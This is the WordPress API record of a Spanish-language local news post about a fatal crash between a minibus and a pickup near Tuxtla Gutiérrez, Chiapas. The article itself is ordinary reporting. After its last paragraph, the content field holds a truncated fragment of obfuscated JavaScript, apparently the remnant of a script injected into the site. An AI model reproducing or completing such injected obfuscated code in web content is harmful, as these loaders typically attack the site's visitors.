{"id":20285,"date":"2025-02-10T05:46:50","date_gmt":"2025-02-10T05:46:50","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20285"},"modified":"2025-02-10T05:46:50","modified_gmt":"2025-02-10T05:46:50","slug":"fuerte-choque-deja-dos-muerts-y-seis-heridos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20285","title":{"rendered":"Fuerte choque deja dos muert@s y seis heridos"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"554\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250209-WA0040-1024x554.jpg\" alt=\"\" class=\"wp-image-20286\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250209-WA0040-1024x554.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250209-WA0040-300x162.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250209-WA0040-768x416.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250209-WA0040-1536x831.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250209-WA0040.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 9 de febrero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Este domingo ocurri\u00f3 un fuerte choque entre una unidad de transporte p\u00fablico y una Nissan Estaquita sobre el tramo Tuxtla-Ixtapa dejanfo un saldo de dos muert@s y seis heridos.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando la Urvan que cubre la ruta Tuxtla-Soyal\u00f3 chocaron de frente a unos 100 metros del Escopetazo.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos de Protecci\u00f3n Civil Municipal de Ixtapa y Chiapa de Corzo para trasladar a los heridos al hospital Gilberto G\u00f3mez Maza para su atenci\u00f3n m\u00e9dica especializada.<\/p>\n\n\n\n<p>Al lugar arribaron peritos de la Fiscal\u00eda General del Estado para realizar las diligencias correspondientes, levantaron los cuerpos y los trasladaron al Semefo donde se practicar\u00eda la necropsia de ley.<\/p>\n\n\n\n<p>En este punto la vialidad se vio interrumpida por m\u00e1s de una hora para remolcar las unidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 9 de febrero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Este domingo ocurri\u00f3 un fuerte choque entre una unidad de transporte p\u00fablico y una Nissan Estaquita sobre el tramo Tuxtla-Ixtapa dejanfo un saldo de dos muert@s y seis heridos. De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando la Urvan que cubre &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20286,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-20285","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20285","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20285"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20285\/revisions"}],"predecessor-version":[{"id":20287,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20285\/revisions\/20287"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20286"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20285"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20285"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20285"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}